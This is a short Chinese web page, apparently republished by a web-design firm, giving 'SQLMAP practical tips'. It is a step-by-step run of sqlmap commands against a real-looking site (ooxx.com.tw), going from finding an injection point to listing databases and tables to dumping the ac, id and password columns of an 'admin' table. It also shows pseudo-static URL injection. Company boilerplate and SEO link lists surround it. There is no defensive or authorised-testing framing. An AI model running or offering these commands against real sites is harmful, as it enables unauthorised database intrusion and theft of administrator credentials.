SQLMAP实用技巧

基础版:

目前创新互联已为上千余家的企业提供了网站建设、域名、雅安服务器托管网站运营、企业网站设计、江城网站维护等服务,公司将坚持客户导向、应用为本的策略,正道将秉承"和谐、参与、激情"的文化,与客户和合作伙伴齐心协力一起成长,共同发展。

  1. 检查注入点

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11

  2. 列数据库信息

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 --dbs

  3. 指定库名列出所有表

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 --tables

  4. 指定库名表名列出所有字段

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin --columns

  5. 指定库名表名字段dump出指定字段

    sqlmap -u http://ooxx.com.tw/star_photo.php?artist_id=11 -D vhost48330 -T admin -C ac,id,password --dump

SQLMAP伪静态注入:

注入页面:http://www.xxx.org/news/class/?103.htm

命令:python sqlmap.py -u “http://www.xxx.org/news/class/?103*.html”


当前名称:SQLMAP实用技巧
文章URL:http://www.hxwzsj.com/article/pedssi.html

其他资讯

Copyright © 2025 青羊区翔捷宏鑫字牌设计制作工作室(个体工商户) All Rights Reserved 蜀ICP备2025123194号-14
友情链接: 成都网站制作 重庆网站建设 专业网站建设 成都网站设计 网站建设改版 成都做网站建设公司 成都网站设计 营销型网站建设 重庆网站建设 网站建设费用 营销网站建设 营销型网站建设 成都商城网站建设 成都网站建设 外贸网站建设 高端定制网站设计 高端品牌网站建设 成都网站建设 企业网站建设 成都企业网站建设 移动手机网站制作 成都网站设计